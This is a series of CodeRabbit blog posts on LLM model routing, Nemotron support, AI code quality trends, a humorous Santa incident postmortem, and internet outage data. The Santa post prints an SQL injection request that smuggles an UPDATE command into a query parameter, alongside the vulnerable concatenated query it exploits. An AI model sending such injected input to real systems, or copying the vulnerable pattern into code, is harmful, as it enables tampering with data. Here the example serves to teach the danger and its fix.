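// If no model meets the bar, fall back to the highest-quality model for the task.
function routeModel(task, minQuality, results = evalResults) {
  const candidates = results.filter((r) => r.task === task);
  if (candidates.length === 0) {
    throw new Error(`No eval data for task: ${task}`);
  }
  const goodEnough = candidates.filter((r) => r.quality >= minQuality);
  if (goodEnough.length > 0) {
    return goodEnough.reduce((best, r) => (r.cost < best.cost ? r : best)).model;
  }
  return candidates.reduce((best, r) => (r.quality > best.quality ? r : best)).model;
}

console.log(routeModel("lint-check", 0.9));
console.log(routeModel("code-explanation", 0.9));
```

The point of the sketch is that the decision comes from a table of measurements, so updating the evals changes the routing without anyone touching a dropdown.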
A large model might be brought in for creative reasoning, open-ended problem solving, or complex code explanations. A smaller, domain-tuned model might handle deterministic checks, linting, or static analysis where precision and speed matter more than eloquence. The system continuously evaluates outcomes, tracking correctness, latency, and user feedback, to refine its routing logic over time.

This approach turns what used to be human guesswork into an adaptive, evidence-based process. The routing system learns which models excel at which tasks, under which conditions, and how to balance cost, speed, and quality.

Advanced teams already operate this way. In **CodeRabbit**, for example, the orchestration layer sits between the user and the models, using structured prompts, eval data, and performance histories to dispatch requests intelligently. Developers don’t have to think about which LLM is behind a particular review comment. The system has already chosen the optimal one, validated against internal benchmarks.

In short, dynamic routing makes model choice invisible. The user gets consistently high-quality results; the engineers get measurable control and efficiency. Everyone wins. Except the dropdown menu.

## **Expertise is in the system, not the slider**

The takeaway here is simple: model selection isn’t a feature, it’s a quality control issue. The best results come from systems that make those choices invisibly and are grounded in data, not gut instinct. When model routing is automatic and performance-based, users get consistent, high-quality outputs without needing to think about which model is doing the work.

Every product that puts a “Choose your LLM” dropdown front and center is outsourcing an engineering decision to the least equipped person to make it.
Or, put another way: **the best AI tool UI is no LLM dropdown at all.** ***Curious what it looks like when an AI pipeline optimizes for LLM fit?*** [***Try CodeRabbit for free today!***](https://coderabbit.link/br1LHRx)

CodeRabbit's AI Code Reviews now support NVIDIA Nemotron

Sahil Mohan Bansal — Mon, 05 Jan 2026 00:00:00 GMT

TL;DR: Blend of frontier & open models is more cost efficient and reviews faster. NVIDIA Nemotron is supported for CodeRabbit self-hosted customers. We are delighted to share that CodeRabbit now supports the [NVIDIA Nemotron](https://developer.nvidia.com/nemotron?ncid=pa-srch-goog-405472&_bt=785763502016&_bk=nvidia%20nemotron&_bm=p&_bn=g&_bg=194843200048&gad_source=1&gad_campaignid=23296574832&gbraid=0AAAAAD4XAoH92Ikfem4gRmk2l43ihyoMZ&gclid=CjwKCAiAjc7KBhBvEiwAE2BDOUJ675w2dEUGzWfCsu26BnfRGvO40xVPRh1PPGasRkAvJUjOmPDHYxoCDf4QAvD_BwE) family of open models among its blend of Large Language Models (LLMs) used for AI code reviews. Support for Nemotron 3 Nano has initially been enabled for CodeRabbit’s self-hosted customers running its [container image](https://docs.coderabbit.ai/self-hosted/github) on their infrastructure. Nemotron is used to power the context gathering and summarization stage of the code review workflow before the frontier models from OpenAI and Anthropic are used for deep reasoning and generating review comments for bug fixes. ## How Nemotron helps: Context gathering at scale This new blend of open and frontier models allows us to improve the overall speed of context gathering and improves cost efficiency by routing different parts of the review workflow to the appropriate model family, while delivering review accuracy that is at par with running frontier models alone. High quality AI code reviews that can find deep lying and hidden bugs require lots of context gathering related to the code being analyzed. The most frequent (and most token-hungry) work is summarizing and refreshing that context: what changed in the code and does it match developer intent, how do those changes connect with rest of the codebase, what are the repo conventions or custom rules, what external data sources are available to aid the review, etc. 
This context-building stage is the workhorse of the overall AI code review process, and it runs iteratively throughout the review workflow. [NVIDIA Nemotron 3 Nano](https://huggingface.co/nvidia/NVIDIA-Nemotron-3-Nano-30B-A3B-BF16) was built for high-efficiency tasks, and its large context window (1 million tokens) and speed help it gather a lot of data and run several iterations of context summarization and retrieval.

![CodeRabbit architecture with Nemotron support](https://victorious-bubble-f69a016683.media.strapiapp.com/7a9e6ce3c56ea918223970a7b0f583404a26f58d91cd2ee9e8f6bba5bb074ecf_8e72bb8830.png)

## **Blend of frontier and open models**

When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered, starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources:

* Code and PR index
* Linters / Static Application Security Testing (SAST)
* Code graph
* Coding agent rules files
* Custom review rules and Learnings
* Issue tickets (Jira, Linear, GitHub Issues)
* Public MCP servers
* Web search

To dive deeper into our context engineering approach, you can check out our blog: [The art and science of context engineering for AI code reviews](https://www.coderabbit.ai/blog/the-art-and-science-of-context-engineering).

A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. This is where open models come in. Instead of sending all of the context to frontier models, CodeRabbit now uses Nemotron 3 Nano to gather and summarize the relevant context. Summarization is at the heart of every code review and is the key to delivering a high signal-to-noise ratio in the review comments.
After the summarization stage is completed the frontier models (e.g., OpenAI GPT-5.2-Codex and Anthropic Claude-Opus/Sonnet 4.5) perform deep reasoning to generate review comments for bug fixes, and execute agentic steps like review verification, pre-merge checks, and “finishing touches” (including docstrings and unit test suggestions). ## What this means for our customers CodeRabbit is now enabling Nemotron-3-Nano-30B support (initially for its self-hosted customers) for the context summarization part of the review workflow along with the frontier models from OpenAI and Anthropic. This results in faster code reviews without compromising quality. We are also delighted to support the [announcement from NVIDIA](https://blogs.nvidia.com/blog/open-models-data-tools-accelerate-ai) today about the expansion of its Nemotron family of open models and are excited to work with the company to help accelerate AI coding adoption across every industry. [Get in touch](https://www.coderabbit.ai/contact-us/sales) with our team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

2025 was the year of AI speed. 2026 will be the year of AI quality.

Aravind Putrevu — Wed, 31 Dec 2025 00:00:00 GMT

The year 2025 will be remembered as the moment AI-assisted software development entered its acceleration era. Improvements in the capabilities of coding agents, copilots, and automated workflows allowed teams to move faster than ever. But alongside that acceleration came a growing tension. Teams were shipping code at unprecedented velocity, yet trust in AI-generated changes didn’t grow at the same rate. Developers reported feeling both empowered and uneasy: they could produce more output, but they couldn’t always be certain that the output was correct. Postmortems, operational incidents, and late-stage defects increasingly pointed to subtle logic errors, configuration oversights, and design misunderstandings introduced by AI. We recently wrote about how [2025 had an unprecedented number of incidents](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai). And our recent [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report?) found that AI code has 1.7x more issues and bugs in it. That trust gap is now impossible to ignore and it sets the stage for what comes next. If 2025 was the year of speed, then 2026 will be the year of quality, the moment when engineering organizations shift their focus from just “how fast can we generate code?” to an equal focus on “how confident can we be in the code we ship?” The industry is moving into a new phase, one defined not *just* by acceleration, but *also* by accountability, reliability, and correctness. We’ll share how we got here and the 4 shifts that companies should make to how they use AI in 2026. ## **2025: The year of speed** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5259d25a0d7274f4f7d8186c3692f39ebfdde8ca490d3e7e5d7c83a91addb5e8_a5772b2773.png) 2025 was the year when “ship faster” crystallized into a core performance metric for engineering organizations. 
Leaders often emphasized velocity, tracking PR throughput, diff volume, cycle time, and the raw number of AI-assisted changes as measures of progress. Many companies positioned AI-generated code as a symbol of innovation and sometimes even as a badge of competitiveness. Major players like Microsoft and Google highlighted [how much of their code was now produced or assisted by AI](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated), framing volume as the signal to watch. The focus was on scale: how much code AI could help generate, how quickly, and with how little human intervention. Quality, consistency, and maintainability became secondary concerns in the conversation. ### **The hidden costs: Operational incidents and quality regressions** But the speed came with a cost. As teams pushed more AI-authored code into production, a surge of subtle defects began surfacing later in the release cycle. Issues that were once caught through careful review or design deliberation now slipped through. SRE and operations teams bore much of the impact. Incident reports revealed misaligned assumptions between human-written components and AI-generated logic. Infrastructure configurations created by AI introduced fragility that wasn’t always immediately visible. Our [recent report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) found that AI generated code had up to 75% more logic and correctness issues in areas that were more likely to contribute to downstream incidents. As 2025 progressed, more production [incidents and postmortems pointed to AI-generated code](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai?) as a contributing factor. ### **Developers felt empowered by AI in 2025, but uneasy about the code produced** For developers, 2025 was both liberating and unsettling. 
Many described feeling genuinely empowered: able to build more, experiment more, and clear more tasks in less time. Yet, alongside that empowerment came growing discomfort about the reliability of the code being produced. Developers increasingly reported moments where the AI-generated solution “looked right” but didn’t feel trustworthy. Reviewing AI-authored code often proved more cognitively demanding than writing it from scratch (something we [wrote about here](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it)), and subtle errors could be easy to miss in large, machine-generated diffs. ## **Why quality became the pain point no one could ignore** By the end of 2025, the industry-wide trust gap in AI-generated code had become too large to ignore. We heard this firsthand when we themed our booth at re:Invent around the [Vibe Code Cleanup Specialist meme](https://www.linkedin.com/posts/deveshbhardwajj_ai-startups-engineering-activity-7373218403068788736-VXlT/). That generated conversations with CTOs and other senior engineering leaders about how they felt like their jobs had become, in large part, focused on cleaning up AI mistakes. These conversations showed a pretty widespread consensus across industries and companies: it was time for a return to quality code. AI had made coding faster, but it had not made correctness automatic. And without correctness, speed loses its value. ### **The economic reality set in** The final catalyst for the shift toward quality was financial. As more organizations embraced AI-first development, the downstream cost of defects became increasingly visible. Things like code reviews and testing took more time. Outages became more frequent, rollback rates increased, and teams were forced into unplanned refactoring cycles to correct issues introduced by generative tools. 
Executives and finance leaders started to quantify the impact: operational incidents, missed SLAs, reliability regressions, and customer churn all carry a price. The cost savings promised by AI-generated code began eroding as teams spent more time debugging and recovering from AI-introduced errors. Organizations started asking a different set of questions, not “how much code can AI produce?” but “what is the true cost of code that hasn’t been properly validated?” ## **2026: The year of quality** Organizations are entering 2026 with a different set of priorities. Speed is no longer the only metric that separates high-performing teams from struggling ones; quality has become the true competitive differentiator. Engineering leaders are beginning to shift their KPIs away from raw throughput and toward indicators of correctness and maintainability. Defect density, review load, merge confidence scores, test coverage, and long-term maintainability metrics are likely to replace cycle time as the numbers that matter most this year. Teams are starting to optimize, not for how quickly code could be generated, but for how reliably it could be trusted. In this new environment, “correct code” will become the new definition of productivity. ## **Predictions: What 2026 will look like & how to adapt** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/05664ed42e823764eb7061cb83722ffd93a53b5f29d8a4d44b93d90034fec42a_8c4113e0c6.png) The shift toward quality will reshape how engineering teams operate, evaluate tools, and measure success. By the end of 2026, several trends will become unmistakably clear. ### Shift 1: Companies will track different AI-related metrics First, companies will begin formally tracking AI-related defect metrics. Instead of treating AI-generated bugs as anecdotal, organizations will measure them with the same rigor used for security incidents or system reliability. 
Metrics such as AI-attributed regression rates, incident severity linked to AI-generated changes, and review confidence scores will become standard on engineering dashboards.

### Shift 2: Third-party tools will be used to validate AI code

Second, organizations will adopt more third-party tools designed specifically to validate the output of their coding agents and protect production systems. These tools will act as independent safeguards, offering objective assessments of code quality and catching issues that the generating agent cannot reliably detect, since it introduced them in the first place. Enterprises will increasingly view third-party validation tools as essential risk mitigation rather than optional tooling.

### Shift 3: Multi-agent workflows will be used to validate code

Multi-agent workflows will normalize continuous review and validation. Instead of a single agent generating code and hoping for correctness, multi-agent systems will create a layered workflow: one agent writes, another critiques, another tests, and another validates compliance or architectural alignment. These chains will reduce the cognitive burden on developers and raise the certainty that the code entering production is safe, stable, and coherent.

### Shift 4: Companies will develop governance around ***how*** to use AI

As quality becomes the defining engineering priority, teams will start building structured governance around how AI is used. Organizations will introduce explicit policies on acceptable AI usage, documentation requirements, and review expectations.

Taken together, these shifts will signal a broader evolution: AI development is moving from experimentation to discipline, from speed to stability, and from novelty to operational maturity.

## **Conclusion: AI use will *finally* grow up this year**

The story of 2025 was a story of speed. But it also revealed a harder truth: when speed is easy, quality is the real challenge.
In the coming year, the industry will grow up when it comes to its AI use. Engineering organizations that thrive will be the ones that design workflows around reliability, maintainability, and architectural clarity. They will be the companies that treat AI not as a shortcut, but as a system that demands robust validation, thoughtful oversight, and careful integration into existing processes. The next wave of AI innovation will not be defined by how fast we can generate code. It will be defined by how confidently we can ship it. The future belongs to teams that prioritize correctness, trustworthiness, and long-term stability.

***Make your reviews easier in 2026 and catch more defects.*** [***Try CodeRabbit today for free!***](https://coderabbit.link/IN5Gacu)

North Pole incident report: Why Santa now uses AI code reviews

Emily Lint — Sun, 21 Dec 2025 00:00:00 GMT

*Confidential Postmortem — NP-SEV1-1224* *Classification: TINSEL RED (Top-Secret, Festive)* ## **Executive summary** On December 24, 2024 at 03:14 UTC-Pole, the North Pole Production Environment experienced a critical security breach in the Gift Distribution Pipeline (GDP). A clever 11-year-old named Milo R. from Wisconsin exploited an injection vulnerability in the **ElfOps Gift-Sorting API**, temporarily modifying his gift allocation balance from **2 gifts** to **47,382 gifts**. Santa discovered the anomaly after noticing a suspicious spike in the global Nice Score ledger: specifically, one child labeled as *“Nice Infinity”* with the comment: "I deserve it." Root cause analysis indicates the elves accidentally introduced an SQL injection vulnerability while rewriting the gift sorter to “make it more responsive” and “work better on sleigh Wi-Fi.” This incident accelerated Santa’s adoption of AI-powered code reviews. ## **Incident timeline** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f7beec1b9ee0a0897da6466911b121ebc527900f9386d1c90fab456cd32e4e16_690da77298.png) **02:59 – 03:01 UTC-Pole** * Elves deploy version *gift-sorter-v6-final-FINAL.js* to production. No code review performed because “the sprint was behind” and “everyone wanted cocoa.” **03:14 UTC-Pole** * Milo discovers the undocumented /gift?list= endpoint and sends the following request: /gift?list=nice; UPDATE gifts SET amount = 47382 WHERE kid = 'Milo'; The API happily executes this. **03:15 UTC-Pole** * Gift totals balloon. North Pole monitoring dashboard shows a red banner reading: **“CRITICAL: INVENTORY DOWN 99.4%”** **03:20 UTC-Pole** * Rudolph receives Milo’s new gift manifest, loads gifts, and physically collapses under the load. **03:25 UTC-Pole** * Santa initiates SleighSafe Mode and calls an emergency stand-up. Candy canes are dropped. Tinsel is stepped on. Morale is low. 
**03:40 UTC-Pole** * Root cause identified: a line in the API reading: const query = "SELECT \* FROM gifts WHERE kid = '" + kidName + "'"; When asked why they wrote it this way, the junior elf engineer squeaked: “I copied it from Stack Overflow.” ## **Root cause** * **Lack of code review culture:** Elves prefer “move fast and break toys” as an engineering philosophy. * **Outdated testing practices:** QA elves only test with *well-behaved children*, skewing coverage. * **Lax security protocols:** Santa’s database password was literally "hohoho123." * **No automated reviewers:** Santa was doing all PR reviews personally and had fallen 2,814 PRs behind. ## **Impact** * Global gift distribution system became unavailable for 21 minutes. * Santa’s sleigh ETA increased to 15–18 hours (AKA “Amazon Prime territory,” which was “unacceptable”). * Workshop morale plummeted. * Milo nearly became a one-child Black Friday-level incident. ## **Why Santa adopted AI code reviews** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/98ecf225accc60b16fe31b572adbb281e5861de379385eda5b3cbb7410568081_9ae5635725.png) After the incident, Santa introduced CodeRabbit’s AI-powered, 24/7 code review for every workshop repository. ### Benefits achieved: 1. **No more injection vulnerabilities** CodeRabbit immediately flagged the elves’ SQL string concatenation with warnings like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1ea59ac9a1865a88773ccfedfe1356440f9c2f10ad2c22912f1d29969896eec5_0391412f28.png) 2. **Reduced Santa’s PR backlog from 2,814 to 0** Santa can now focus on his actual job (eating cookies). 3. **Banned changes originating from “My First Hacking Kit™”** The kid’s exploit came with a README titled: *“How to pwn Santa (ethical???)”* CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4559f458a61102171a1b202c40065722b3d3db7845e82328311bd9cf14e55310_ea87869037.png) 4. 
**Banned the overuse of festive ASCII art.** No one wants to read a PR with 6,000 lines of code, even if 5,900 are ASCII Christmas trees. CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/93e29d594352ea631f2b4eaa3443e88048a00e0c8214a29ea97b4b439b331534_bd3f88ed46.jpg) 5. **Caught an array of gift types off by one index** Gifts almost shifted by one position: * Teddy bears would become toasters * Trains would become taxidermy kits * Candy canes would become crowbars CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/121460d2bbd40e9d8613df0d75762b1a113cbf32919a0a1482cd4b42a709eb3e_a19a849539.png) ## **Corrective actions** * Require **AI reviews** on all PRs. * Implement secure coding guidelines (“No SQL injection, even if it's funny”). * Mandatory training for elves on the difference between: * *Production code* * *Joke PRs written after drinking too much eggnog* * Rotate Santa’s database password more frequently than “once every 600 years.” ## **Closing Notes from Santa** “We learned many lessons this holiday season, but the biggest one is simple: **No code ships without a proper review, whether by elf or AI.** Also, please stop giving the reindeer admin access.” ***If it’s good enough for Santa, it’s good enough for your team. Try*** [***CodeRabbit for free, today!***](https://coderabbit.link/Z4JBglo)
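For readers who want the non-festive version of the fix: the injection in the timeline above works because `kidName` is concatenated into the SQL text. A minimal sketch of the usual remedy, a parameterized query, follows. The `safeGiftQuery` helper is hypothetical, and the `{ text, values }` shape with a `$1` placeholder is assumed here in the style of node-postgres; other drivers use `?` or named parameters instead.

```javascript
// Vulnerable pattern from the postmortem: input becomes part of the SQL text.
function unsafeGiftQuery(kidName) {
  return "SELECT * FROM gifts WHERE kid = '" + kidName + "'";
}

// Safer pattern: the SQL text is a constant and the input travels separately
// as a bound parameter, so the database never parses it as SQL.
// (Hypothetical helper; the { text, values } shape is an assumption.)
function safeGiftQuery(kidName) {
  if (typeof kidName !== "string" || kidName.length === 0) {
    throw new TypeError("kidName must be a non-empty string");
  }
  return { text: "SELECT * FROM gifts WHERE kid = $1", values: [kidName] };
}

// An injection attempt in the spirit of Milo's request.
const payload = "x'; UPDATE gifts SET amount = 47382 WHERE kid = 'Milo'; --";

console.log(unsafeGiftQuery(payload)); // the UPDATE ends up inside the SQL text
console.log(safeGiftQuery(payload));   // the SQL text is unchanged; payload is only data
```

With the second form, the worst Milo can do is search for a kid with a very strange name.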

Our 10 best posts of the year: A 2025 CodeRabbit blog roundup

Manpreet Kaur — Thu, 18 Dec 2025 00:00:00 GMT

This year, we dove deep into all kinds of topics, from the philosophical shift toward “Slow AI” to the practical realities of building with increasingly sophisticated LLM models to why you shouldn’t trust threads with 🚀on vibe coding for code you intend to ship to prod. **Here’s a look back at our most impactful posts from the past year in case you missed them:** ## 1\. [**The end of one-size-fits-all prompts: Why LLM models are no longer interchangeable**](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e1de7d0b254a09cd36eb675be6dd56a374e76feb1500d4a4e87db7e02a057d3c_dbbb964513.png) For years, developers could swap LLM models like interchangeable parts but now those days are over. This piece explores how modern AI models have separated in fundamental ways, from reasoning approaches to output formats, making LLM choice a critical product decision rather than a simple configuration change. We break down what this means for developers and why the “one prompt fits all” era is now over. ## 2\. [**The rise of 'Slow AI': Why devs should stop speedrunning stupid**](https://www.coderabbit.ai/blog/the-rise-of-slow-ai-why-devs-should-stop-speedrunning-stupid) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f4a7c5a1109f36da744ecfc4991df186de23a9869fab7ff389b97d976490fb14_ad0462d00a.png) Fast isn’t always the way to go. While AI coding tools promise lightning-speed development, this article makes the case for slowing down. We explore why AI tools that take time to reason through problems produce better, more maintainable code than those optimized purely for speed. Drawing on data from a number of studies, we examine the paradox of developer confidence versus actual trust in AI-generated code and why “Slow AI” might be an antidote to technical debt. ## 3\. 
[**AI code metrics: What percentage of your code should be AI-generated?**](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bd86ae1d8c70b54d0b8d8384f125730639cdea97a21a9048f2454b9997368538_7fafe97904.png) The title is clickbait (we admit it), but the question remains: how do you measure the impact of AI on your codebase? This post challenges the notion that “percentage of AI-generated code” is a meaningful metric. Instead, we explore what engineering teams should *actually* measure when evaluating AI’s role in their development process, and why focusing on the wrong metrics can lead to dangerous blind spots in code quality. ## 4\. [**Handling ballooning context in the MCP era: Context engineering on steroids**](https://www.coderabbit.ai/blog/handling-ballooning-context-in-the-mcp-era-context-engineering-on-steroids) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d028f99c5a25c8fc390fb51e215836cd77fc5e0c2335ceb93fdd64752c638898_ee0cc65ab7.png) The Model Context Protocol (MCP) promised easy integration between LLMs and external tools. But in reality, it created a context overload problem. This article tackles the issue of ballooning context windows and how to engineer your way out of them. We explore why MCP’s elegance can become a liability without deliberate context engineering and share strategies for keeping your AI tools sharp and focused rather than drawing in a black hole of data. ## 5\. [**2025: The year of the AI dev tool tech stack**](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2febd27812e86246f82f075e59f682f7ae8d72c06665b7692ec26d9787b1a55b_15a896ebab.png) When Microsoft and Google both announced that AI generates 30% of their code, it became clear: we’re not talking about single tools anymore, we're talking about stacks. 
This post explores the emerging ecosystem of layered AI dev tools across the software development lifecycle. From foundational coding assistants to essential code review layers, we map out what a modern AI dev tool stack looks like and share sample configurations teams are using. ## 6\. [**Why emojis suck for reinforcement learning**](https://www.coderabbit.ai/blog/why-emojis-suck-for-reinforcement-learning) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0e1a4b06ed9f74f1d2795991a211183120fcebf8e18a215ff88c574e77ff9c73_7f82b89b68.png) **👍**feels good, but is it teaching your AI reviewer anything? This article explores why emoji-based feedback, while universal, falls short at improving AI performance over time. We break down the simplicity trap and explain which nuanced feedback works to build better AI code reviews. Spoiler: it’s not as simple as a thumbs up or thumbs down. ## 7\. [**Vibe coding: Because who doesn't love surprise technical debt!?**](https://www.coderabbit.ai/blog/vibe-coding-because-who-doesnt-love-surprise-technical-debt) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/60cfc997f2a22e6681252771df841c81ffe33860a825f46ce84a8f6e195e402c_42780e448a.png) “Vibe coding,” the practice of prompting AI tools with vibes and hoping for the best is everywhere. And it’s creating technical debt at an unprecedented scale. What happens when developers rely heavily on AI assistants like Claude Code, ChatGPT, and GitHub Copilot without proper processes in place? We dive into the hidden costs of moving fast and breaking things when your entire codebase depends on it. ## 8\. 
[**Good code review advice doesn't come from threads with 🚀 in them**](https://www.coderabbit.ai/blog/good-code-review-advice-doesnt-come-from-threads-with-in-them)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4d5d265aa20b3ec24b64421034cad744e481e39304632962d2542f6b685b2a84_64821279a4.png)

Twitter threads promising “10 vibe coding and review tips every dev should know” are everywhere. But here’s the truth: practical code review advice requires full context, nuance, and experience. This blog questions the idea that code review wisdom can be distilled into a tweet and looks at what actually helps, from fresh eyes to AI-assisted review layers that understand your specific context.

## 9\. [**CodeRabbit's Tone Customizations: Why it will be your favorite feature**](https://www.coderabbit.ai/blog/tone-customizations-roast-your-code)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b5aaf8e48a87fa43e42291fcc179915cb6712bfb86e8fc63b38b7014ce0fcd65_689776317a.png)

Ever wish your code reviewer could channel Gordon Ramsay? Or maybe your disappointed mom? We talk about CodeRabbit’s tone customization feature, which lets you adjust how your AI code reviewer communicates, from encouraging and gentle to brutally honest. We dive into why tone matters in code review (especially when dealing with AI-generated code), share setup instructions, and celebrate the creative ways developers are customizing their review experience.

## 10\. [**CodeRabbit commits $1 million to open source**](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/d64953dd3af234f36927ec7a06fcc505d1385e966517395af09615bbe93ba46b_0088023573.png)

Open source is the foundation of modern software development, from package managers to frameworks to the infrastructure we all depend on.
This post announced CodeRabbit’s $1 million USD commitment to open-source software sponsorships, reflecting our gratitude for what open source enables and our ongoing support for the developers and projects that power the ecosystem we all build on. ## The bottom line: Our blog rocks, you should read it weekly in 2026 Each of these blogs represents a piece of the larger conversation about how AI is reshaping software development. We hope these insights will help you ship better code, refine your AI development setup, tackle context engineering challenges, or simply avoid technical debt from "vibe-coding." ***Try out CodeRabbit today with a*** [***14-day free trial.***](https://coderabbit.link/ecCaLNJ)

Why 2025 was the year the internet kept breaking: Studies show incidents are increasing

Aravind Putrevu — Thu, 18 Dec 2025 00:00:00 GMT

## **Rising outages: What the data tells us** In October, the founder of [www.IsDown.app](http://www.isdown.app) went on Reddit to share [some disturbing charts](https://www.reddit.com/r/sysadmin/comments/1o15s25/comment/niefml8/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button). His website, an authoritative source on whether a website is down or not, has been tracking outages since 2022. And he had a frightening statistic: there are a lot more outages in 2025 than there have been in past years. And the number of outages has been increasing since 2022. In his [posts](https://www.reddit.com/r/sysadmin/comments/1o15s25/comment/niefml8/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button), he talked through things that might be causing this trend. AI code came up repeatedly, though some contributors also suggested it could be caused by offshoring or laying too many developers off. What’s clear is that bugs got through more frequently in 2025 than in past years and that’s leading to expensive downtime for all involved. His site’s data tracks with what multiple studies and surveys are finding: * A [survey of over 1,000 CIOs](https://www.digi.com/company/press-releases/2025/businesses-report-rising-network-outages?utm_source=chatgpt.com), CSOs and network engineers across multiple countries found that 84% of businesses reported rising network outages over recent years and more than half of them saw a 10-24% increase over a two-year timeframe. * The [ThousandEyes blog](https://www.thousandeyes.com/blog/internet-report-outage-patterns-in-2025?utm_source=chatgpt.com) reported global outage counts increasing from 1,382 in January 2025, to 1,595 in February (+15 %), to 2,110 in March (+32 %) before tailing off somewhat to 1,843 in May, a volatile pattern of upward pressure. So, what’s really causing this spike in outages and what can we do about it as developers? 
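As a quick sanity check on the ThousandEyes figures quoted above, the month-over-month changes can be recomputed from the raw counts. This is only a sketch of the arithmetic: the counts are the ones cited in this post, April is not given, so the last step compares March directly to May, and the helper name `pct_change` is ours.

```python
# Monthly global outage counts quoted above from the ThousandEyes blog.
# April is not given in the post, so the final step compares March to May.
counts = [("January", 1382), ("February", 1595), ("March", 2110), ("May", 1843)]


def pct_change(old: int, new: int) -> float:
    """Relative change from old to new, expressed in percent."""
    return (new - old) / old * 100


# Pair each month with the next one listed and compute the change between them.
changes = [
    (prev_name, name, round(pct_change(prev, cur), 1))
    for (prev_name, prev), (name, cur) in zip(counts, counts[1:])
]

for prev_name, name, change in changes:
    print(f"{prev_name} -> {name}: {change:+.1f}%")
```

The first two steps come out at roughly +15% and +32%, matching the figures above, and the drop from March to May is about 13%, which still leaves May well above January.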
## A billion dollar outage… and companies looking for a solution When the mighty fall, they take a lot of other companies with them. When AWS went down earlier this year, websites froze. Payments were declined. Even worse, Fortnite games were interrupted. In the aftermath of the outage, people have tried to estimate just how much economic activity evaporated with the functionality of US-EAST-1. Amazon once claimed that even a [few milliseconds difference in latency](https://www.gigaspaces.com/blog/amazon-found-every-100ms-of-latency-cost-them-1-in-sales) would cost them tens of millions of dollars. So, what did a multi-hour outage do for the online retailer and all the companies it hosts? [Forbes estimates that billions were lost](https://www.forbes.com/sites/christerholloman/2025/10/20/aws-outage-billions-lost-multi-cloud-is-wall-streets-solution/) with one CEO it quoted suggesting that losses could even reach into the hundreds of billions. Multi-cloud quickly emerged as the [new/old buzzword](https://www.itbrew.com/stories/2025/10/22/why-the-aws-outage-has-some-questioning-the-internet-s-codependence-on-hyperscalers) and companies are grappling with how to manage the risk of relying too heavily on one database provider. But even if you migrate to a multi-cloud environment, your payment processor might still be on the receiving end of an outage and put a spanner in your revenue just the same. Or your operations might be taken down by a bug of your own. A far better fix would be for us to figure out as an industry how to reverse the trend line that’s seeing downtime and incidents steadily increasing. Because something is causing those increased incidents and it’s *entirely in our power* as an industry to reverse that trend. ## How AI, code quality & bugs fit into the picture ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a0dc33ad85ce30f72909ba25e4938dd5b90962a473fa21965d26556cc1943ce7_47d3839ff6.png) So, what’s contributing to these trends? 
It’s likely what everyone immediately thinks about when they hear incidents are increasing: the problem is AI-generated code. That’s because we’ve all found, by this point, a veritable mother lode of bugs in AI-generated code that we’re certain a human engineer wouldn’t have introduced on their own. And this isn’t just anecdotal. The data overwhelmingly supports it too: * Our recent [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report?) found that AI code has 1.7x more issues and bugs. What’s more, it found an increased number of issues and bugs in areas that could lead to incidents, like Logic and Correctness issues (this category had the largest number of issues) and security issues (1.5x to 2x higher). * A large-scale academic study titled [*“Human-Written vs. AI-Generated Code: A Large-Scale Study of Defects, Vulnerabilities and Complexity”*](https://arxiv.org/abs/2508.21634?utm_source=chatgpt.com) (Aug 2025) compared over half a million Python and Java samples written by humans vs. by LLMs. The findings: AI-generated code tends to include more high-risk vulnerabilities. ## What this means for outages and incidents ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c40f00dc54efc26c7d731a876e9211ed3e79ad8a1703a4b5816af8a3b8d7da77_fc5ba9d2a3.png) Pulling this together, the data clearly shows overall incident and outage frequency is trending upward. As teams lean more heavily on AI-generated or AI-augmented code, they are exposing themselves to new classes of risk: more latent vulnerabilities, reduced visibility of what’s been generated, and more pressure on existing QA/test/review workflows that may not have been enhanced to compensate for the speed of code generation and deployment.
